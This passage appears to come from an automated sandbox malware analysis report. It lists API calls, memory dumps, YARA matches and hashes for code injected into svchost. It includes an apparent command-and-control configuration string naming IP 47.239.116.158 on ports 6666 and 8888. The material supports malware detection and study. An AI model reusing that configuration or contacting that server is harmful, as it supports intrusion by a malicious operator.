• Process32NextW.KERNEL32(00000000,0000022C), ref: 04DF615F
• CloseHandle.KERNELBASE(00000000,?,?,00000000), ref: 04DF6166
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
• String ID:
• API String ID: 2526126748-0
• Opcode ID: 8e0cf4449288cdef0568499f8ccbbd61d6898ff61ccbd131dd638ef84550bf5c
• Instruction ID: 1715d8ec46ea62435f9360ab7b13cd151c104d1cc013f17b3a9902c4305aa4be
• Opcode Fuzzy Hash: 8e0cf4449288cdef0568499f8ccbbd61d6898ff61ccbd131dd638ef84550bf5c
• Instruction Fuzzy Hash: 9221F3317001149BEB30EF74EC45BEAB3A8FF08325F0142A9DE1987181EB35EA01C650
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 025832E1
• Sleep.KERNELBASE(00000258), ref: 025832EE
• InterlockedExchange.KERNEL32(?,00000000), ref: 025832F6
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02583302
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0258330A
• Sleep.KERNELBASE(0000012C), ref: 0258331B
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
• String ID:
• API String ID: 3137405945-0
• Opcode ID: 6b6070056bea72206e92eacf68510b95ab357fede238eb396845accacf7f8511
• Instruction ID: 4f5215b873f409c51aa8b11e009a392f2526f27d0a59a1a3ab468196fb5439ad
• Opcode Fuzzy Hash: 6b6070056bea72206e92eacf68510b95ab357fede238eb396845accacf7f8511
• Instruction Fuzzy Hash: AFF082722443046BD610EBA9DC84E56F3A8EF85330B214B09F321872D0CAB0E8158BA4
APIs
• _malloc.LIBCMT ref: 02587011
  • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
  • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
  • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
• std::exception::exception.LIBCMT ref: 02587046
• std::exception::exception.LIBCMT ref: 02587060
• __CxxThrowException@8.LIBCMT ref: 02587071
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
• Opcode ID: cfa80d5a1b74b64ace04ab6141d1973999d421a1c89d4ed1e4b746bc33d60b73
• Instruction ID: 92d432745b104bbea5291aad9a05cbd053bab21d94a42244457fedaf1e4248d0
• Opcode Fuzzy Hash: cfa80d5a1b74b64ace04ab6141d1973999d421a1c89d4ed1e4b746bc33d60b73
• Instruction Fuzzy Hash: EBF0CD3590010AEADF05FF55DC009ADBFABBB85714F240415E405B6090EBF1C654CF6D
APIs
• _malloc.LIBCMT ref: 04DFF771
  • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
  • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
  • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
• std::exception::exception.LIBCMT ref: 04DFF7A6
• std::exception::exception.LIBCMT ref: 04DFF7C0
• __CxxThrowException@8.LIBCMT ref: 04DFF7D1
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
• Opcode ID: a362243f0c796016f2fcb48707056142099d819b3c45017bf36cc4ca4145c03d
• Instruction ID: c8d4312e2362fbd076c0b49ab10f2438332258bf8a1acef3845c92a1dad38068
• Opcode Fuzzy Hash: a362243f0c796016f2fcb48707056142099d819b3c45017bf36cc4ca4145c03d
• Instruction Fuzzy Hash: D8F0F471A40609ABEB24EF15DD25E6EBAA5EF00758F11000EEA14E60E0DB70FA00CB94
APIs
• lstrlenW.KERNEL32(?), ref: 02586431
  • Part of subcall function 02585E30: _memset.LIBCMT ref: 02585E61
• CreateThread.KERNELBASE(00000000,00000000,02586110,00000000,00000000,00000000), ref: 0258645E
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0258646C
• CloseHandle.KERNEL32(?), ref: 02586479
Strings
• |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 0258643D
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: CloseCreateHandleObjectSingleThreadWait_memsetlstrlen
• String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
• API String ID: 1730619010-42098077
• Opcode ID: 0a3bcff8555b5bbe16dcf31f7ee8555aba4cc18321ae21690e9bcb6d44e47a14
• Instruction ID: 0bf2c25a1a37e58797fc9a2ab5e867ccb7d85412793ac0bf704f47e6fb3fe825
• Opcode Fuzzy Hash: 0a3bcff8555b5bbe16dcf31f7ee8555aba4cc18321ae21690e9bcb6d44e47a14
• Instruction Fuzzy Hash: 93F08931982214BFDB107F90ED0AF65376CBB05B11F510910F309651C1D7B4602497AC
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02582D2C
• CancelIo.KERNEL32(?), ref: 02582D36
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 02582D3F
• closesocket.WS2_32(?), ref: 02582D49
• SetEvent.KERNEL32(00000001), ref: 02582D53
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
• String ID:
• API String ID: 1486965892-0
• Opcode ID: f067bc014acb50d6e823631edce8cf0b82befa1178fbd086b5b98ab8d5976a6e
• Instruction ID: 7abedc5de6336486a46c4b3e0d4485cfbd0b196e6d5b457faa67b328d0cb622b
• Opcode Fuzzy Hash: f067bc014acb50d6e823631edce8cf0b82befa1178fbd086b5b98ab8d5976a6e
• Instruction Fuzzy Hash: C5F0AF76541700ABC330DF54DC09F6677B8FB48B11F504A19F68293680D7B0B428DBE4
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 04DF2D5C
• CancelIo.KERNEL32(?), ref: 04DF2D66
• InterlockedExchange.KERNEL32(00000000,00000000), ref: 04DF2D6F
• closesocket.WS2_32(?), ref: 04DF2D79
• SetEvent.KERNEL32(00000001), ref: 04DF2D83
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                              • String ID:
                                                                                                              • API String ID: 1486965892-0
                                                                                                              • Opcode ID: 0807901103cbf8650813d55275efdfb410544a23c6638cbf42276fcb9d267cb7
                                                                                                              • Instruction ID: 4719f8f982bac8294d6396b7b24f6ee83811fc7cc06d34bf952a87dc008852fe
                                                                                                              • Opcode Fuzzy Hash: 0807901103cbf8650813d55275efdfb410544a23c6638cbf42276fcb9d267cb7
                                                                                                              • Instruction Fuzzy Hash: 40F08175240300ABD2309F55DD09B66B3B8FB48B12F10061CFA9292694CAB4B9048B90
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02A00239
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction ID: 01d276f8ea21cc1feeb37fce51679756bf48106b2eb0bf26f51472b818954dd2
                                                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction Fuzzy Hash: ACA14770A00606AFDB15CFA9D8C0BAEB7B5FF48318F1480A9E515E7391DB70EA51CB94
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0258313B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02583153
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 025831FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033114805-0
                                                                                                              • Opcode ID: 03877518a1b2b38cc90ea8df6c4db182e0fe28993a58fcab80c23dad2eebc156
                                                                                                              • Instruction ID: 67cad6151162cda06dd5603fdb5bea59e37ce0dcb162f32e05b9ba8f81611631
                                                                                                              • Opcode Fuzzy Hash: 03877518a1b2b38cc90ea8df6c4db182e0fe28993a58fcab80c23dad2eebc156
                                                                                                              • Instruction Fuzzy Hash: C2317F70200602EFC714EF69C884A76B7E5FF44B14B10C96DE85AEB615E7B1F852CB98
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF316B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04DF3183
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DF322F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033114805-0
                                                                                                              • Opcode ID: ad68a7647655ff98dce67a19f6a121b17518dc78f77bc85b5099e5704fa53002
                                                                                                              • Instruction ID: 6fd7a3f7a4e5bf9993412571ad815bf6c72847ae61eb4242e618b00f9a5bcdb0
                                                                                                              • Opcode Fuzzy Hash: ad68a7647655ff98dce67a19f6a121b17518dc78f77bc85b5099e5704fa53002
                                                                                                              • Instruction Fuzzy Hash: A7314970300602EFDB24DF69C984A6AB3E5FF44709B12C52DEA5ACB655E731F841CB90
                                                                                                              APIs
                                                                                                              • InterlockedDecrement.KERNEL32(00000008), ref: 04DF536F
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 04DF5384
                                                                                                              • SysAllocString.OLEAUT32(04E16148), ref: 04DF53D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String$AllocDecrementFreeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 3605875487-0
                                                                                                              • Opcode ID: ab3d1f315bd773a095fbf4cb18489b9544e7e5f98f99ae3463d8de67bbeeec06
                                                                                                              • Instruction ID: 82ad09b4bc9906989f9dddb6de1706154d98f62b0a39c7257c7f8b66662b6394
                                                                                                              • Opcode Fuzzy Hash: ab3d1f315bd773a095fbf4cb18489b9544e7e5f98f99ae3463d8de67bbeeec06
                                                                                                              • Instruction Fuzzy Hash: 4C31BF71600615ABEB30DF69EC90B5AB7E8FB04B24F158629EE559B340D7B5F900CB90
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 025811E9
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02581226
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02581255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: f2cb2eaf30531af0721681908d109d8643cbb5626ccc39a8da45874fe4639f73
                                                                                                              • Instruction ID: e22646f87f3e8b0491cc4d699f602106160bafd49520846540e79291df4b8b21
                                                                                                              • Opcode Fuzzy Hash: f2cb2eaf30531af0721681908d109d8643cbb5626ccc39a8da45874fe4639f73
                                                                                                              • Instruction Fuzzy Hash: 1F21D470F007099FDB10AFAAD845B6EFBF8FF40705F00C9ADE949E2640E670A8108B58
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 04DF11E9
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 04DF1226
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DF1255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 915a9fa2e148716aebe31088f6368804c648aa47f32514a59e2c499ce8209365
                                                                                                              • Instruction ID: b1c6b6d42eb9a4bd30fbdd42c523dc27624eb49b1d856ee1d3090b12480dc4f4
                                                                                                              • Opcode Fuzzy Hash: 915a9fa2e148716aebe31088f6368804c648aa47f32514a59e2c499ce8209365
                                                                                                              • Instruction Fuzzy Hash: 7A218E71A00709AFDB249FAADC46B6EBBF4EF40705F008969E959A2640EA34BC508750
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 0258112F
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0258115F
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02581192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 3259edbcacf92c5190e6480c5e821090b12a4e45aad8d48af7cf0171055538af
                                                                                                              • Instruction ID: c488c192543b9a2e916f04d9f98ac2256d6e9568da7c493eb516ae3c7e2298b8
                                                                                                              • Opcode Fuzzy Hash: 3259edbcacf92c5190e6480c5e821090b12a4e45aad8d48af7cf0171055538af
                                                                                                              • Instruction Fuzzy Hash: 1F119670E40705ABDB10AFA9DD85B6EFBF8FF04705F0088A9E959E2240E670A954C758
                                                                                                              APIs
                                                                                                              • __floor_pentium4.LIBCMT ref: 04DF112F
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 04DF115F
                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DF1192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605973128-0
                                                                                                              • Opcode ID: 21b324f654b1ead51348bd79c87cd4cafe82eccc0a56e99193ec70097208d967
                                                                                                              • Instruction ID: adc83283770ca97f09b2ea939e615320ffea9e832b63969ee375f4ad0c233017
                                                                                                              • Opcode Fuzzy Hash: 21b324f654b1ead51348bd79c87cd4cafe82eccc0a56e99193ec70097208d967
                                                                                                              • Instruction Fuzzy Hash: 4E119370A40704AFEB209FAADC85B6EFBF8FF04705F008569EE59E2240E674AD54C750
                                                                                                              APIs
                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DF9E54
                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 04DF9E68
                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 04DF9E8B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                              • String ID:
                                                                                                              • API String ID: 800915452-0
                                                                                                              • Opcode ID: aca43b0453f72a49b657d9238aab3aeead8189201c20c3d8338a13300366f21d
                                                                                                              • Instruction ID: 5ec45144558fc182b4d8fd613833d65f0e69ef5b26eef043fc300ded8779b9ea
                                                                                                              • Opcode Fuzzy Hash: aca43b0453f72a49b657d9238aab3aeead8189201c20c3d8338a13300366f21d
                                                                                                              • Instruction Fuzzy Hash: 26F0F4B1E00219A78B20EF94D8048AFBB78FB44715B01819AED01A7300CA309E00CBD1
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(04E1FB64), ref: 04DF9B2C
                                                                                                              • GdiplusStartup.GDIPLUS(04E1FB60,?,?), ref: 04DF9B65
                                                                                                              • LeaveCriticalSection.KERNEL32(04E1FB64), ref: 04DF9B76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                              • String ID:
                                                                                                              • API String ID: 389129658-0
                                                                                                              • Opcode ID: c45d8cacb31528159e02227081295f441617797beeb5809a3ac4ffba039e6da5
                                                                                                              • Instruction ID: c06f65bd0e1788498214e22a767e2ded35f8804edcdd12b2c364c7e24a402d20
                                                                                                              • Opcode Fuzzy Hash: c45d8cacb31528159e02227081295f441617797beeb5809a3ac4ffba039e6da5
                                                                                                              • Instruction Fuzzy Hash: E8F096759C12099FDB209FD2E87AFFAB7B8F704316F400289E91852150D779A544CFE5
                                                                                                              APIs
                                                                                                              • __getptd_noexit.LIBCMT ref: 0258723B
                                                                                                                • Part of subcall function 02589902: GetLastError.KERNEL32(00000001,00000000,025871F2,02586FEC,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02589906
                                                                                                                • Part of subcall function 02589902: ___set_flsgetvalue.LIBCMT ref: 02589914
                                                                                                                • Part of subcall function 02589902: __calloc_crt.LIBCMT ref: 02589928
                                                                                                                • Part of subcall function 02589902: DecodePointer.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 02589942
                                                                                                                • Part of subcall function 02589902: GetCurrentThreadId.KERNEL32 ref: 02589958
                                                                                                                • Part of subcall function 02589902: SetLastError.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 02589970
                                                                                                              • __freeptd.LIBCMT ref: 02587245
                                                                                                                • Part of subcall function 02589AC4: TlsGetValue.KERNEL32(?,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589AE5
                                                                                                                • Part of subcall function 02589AC4: TlsGetValue.KERNEL32(?,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589AF7
                                                                                                                • Part of subcall function 02589AC4: DecodePointer.KERNEL32(00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B0D
                                                                                                                • Part of subcall function 02589AC4: __freefls@4.LIBCMT ref: 02589B18
                                                                                                                • Part of subcall function 02589AC4: TlsSetValue.KERNEL32(00000005,00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B2A
                                                                                                              • ExitThread.KERNEL32 ref: 0258724E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4224061863-0
                                                                                                              • Opcode ID: d8135d9fd0254e429852768956a47d395d3be91556c286fadb91a4cf3922024f
                                                                                                              • Instruction ID: c78b53c6a0b0ac24af5cf9874cbe91ae46d85042904c348f024884b1a7ee2e84
                                                                                                              • Opcode Fuzzy Hash: d8135d9fd0254e429852768956a47d395d3be91556c286fadb91a4cf3922024f
                                                                                                              • Instruction Fuzzy Hash: FAC02B300002093B8B003B31CC0D82E3E4EBDC030879C4410F805A5140EFF0EC10DC9C
                                                                                                              APIs
                                                                                                              • __getptd_noexit.LIBCMT ref: 04DFF9B9
                                                                                                                • Part of subcall function 04E03E32: GetLastError.KERNEL32(00000001,00000000,04DFF970,04DFF74C,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04E03E36
                                                                                                                • Part of subcall function 04E03E32: ___set_flsgetvalue.LIBCMT ref: 04E03E44
                                                                                                                • Part of subcall function 04E03E32: __calloc_crt.LIBCMT ref: 04E03E58
                                                                                                                • Part of subcall function 04E03E32: DecodePointer.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03E72
                                                                                                                • Part of subcall function 04E03E32: GetCurrentThreadId.KERNEL32 ref: 04E03E88
                                                                                                                • Part of subcall function 04E03E32: SetLastError.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03EA0
                                                                                                              • __freeptd.LIBCMT ref: 04DFF9C3
                                                                                                                • Part of subcall function 04E03FF4: TlsGetValue.KERNEL32(?,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E04015
                                                                                                                • Part of subcall function 04E03FF4: TlsGetValue.KERNEL32(?,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E04027
                                                                                                                • Part of subcall function 04E03FF4: DecodePointer.KERNEL32(00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E0403D
                                                                                                                • Part of subcall function 04E03FF4: __freefls@4.LIBCMT ref: 04E04048
                                                                                                                • Part of subcall function 04E03FF4: TlsSetValue.KERNEL32(00000013,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04E0405A
                                                                                                              • ExitThread.KERNEL32 ref: 04DFF9CC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4224061863-0
                                                                                                              • Opcode ID: 8af508f118ff9aef96b134c854e7ca1acd4011047acce8aa0ca7d727c31453a4
                                                                                                              • Instruction ID: 6b80d1e7bf3b880c1e5fa641f8ad469612f0d79f609d0b50f2b1b960cdf2d6f1
                                                                                                              • Opcode Fuzzy Hash: 8af508f118ff9aef96b134c854e7ca1acd4011047acce8aa0ca7d727c31453a4
                                                                                                              • Instruction Fuzzy Hash: 50C08C300002452FAB103B32CC0D80BBA1D9F8020470440156D1495090DE24FC81C090
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF843D
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
                                                                                                                • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
